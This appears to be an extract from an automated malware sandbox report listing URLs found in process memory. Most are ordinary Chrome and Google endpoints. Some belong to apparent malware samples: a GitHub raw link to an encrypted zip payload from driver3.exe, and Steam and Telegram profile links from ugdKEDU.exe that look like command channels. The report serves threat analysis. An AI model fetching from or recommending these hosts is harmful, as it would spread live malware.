Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273v
Source: LCESjzR.exe, 0000001D.00000000.2902504955.00000000002B1000.00000020.00000001.01000000.00000013.sdmp String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235163598.00002AD800A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 0000002E.00000002.3241550410.0000468800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 0000002E.00000002.3241550410.0000468800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardF
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 0000002E.00000002.3265636523.0000468800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235163598.00002AD800A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3140105334.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3140105334.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000002E.00000003.3107257230.00004688006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3264131371.0000468800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/apip
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000002E.00000002.3229296923.00002AD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002E.00000002.3233203559.00002AD8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234459258.00002AD800948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyp
Source: chrome.exe, 0000002E.00000002.3233203559.00002AD8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneEn
Source: chrome.exe, 0000002E.00000002.3239412525.00002AD8010BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000002E.00000002.3234459258.00002AD80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136642421.00002AD800F7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3135346493.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 0000002E.00000002.3235461744.00002AD800AA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233890752.00002AD800874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002E.00000002.3239143501.00002AD800FEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000002E.00000002.3234459258.00002AD80095B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136642421.00002AD800F7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3135346493.00002AD800ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 0000002E.00000003.3139138765.00002AD8006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139457002.00002AD80123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: driver3.exe, 00000020.00000003.2975099151.0000020E7B3D9000.00000004.00000020.00020000.00000000.sdmp, driver3.exe, 00000020.00000002.3222957219.0000020E7B36C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/lordx1555/update/main/fox.zip.enc
Source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://raw.githubusercontent.com/lordx1555/update/main/fox.zip.encDownload
Source: chrome.exe, 0000002E.00000002.3228021851.00002AD80009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellU
Source: ugdKEDU.exe, 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: chrome.exe, 0000002E.00000002.3235016954.00002AD8009F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: Macromedia.com, 00000017.00000003.3339397288.00000000018F4000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.2806689913.000000000437C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: skotes.exe, 0000000A.00000002.3535140516.00000000008C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236324182.00002AD800C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: ugdKEDU.exe, 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.entrust.net/rpa0
Source: Macromedia.com, 00000017.00000003.2806689913.000000000437C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 0000002E.00000003.3143311727.00002AD8002AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 0000002E.00000002.3239857447.00002AD8011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002E.00000002.3235632446.00002AD800ADC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 0000002E.00000002.3232988567.00002AD800764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Charii3
Source: chrome.exe, 0000002E.00000002.3235730253.00002AD800B08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000002E.00000002.3239640072.00002AD8010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233295806.00002AD8007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234262741.00002AD8008F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002E.00000002.3239640072.00002AD8010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3233295806.00002AD8007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234262741.00002AD8008F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000002E.00000002.3230592826.00002AD8005E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236270361.00002AD800C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000002E.00000002.3229445638.00002AD80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238174485.00002AD800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000002E.00000002.3235357971.00002AD800A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000002E.00000003.3143311727.00002AD8002AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
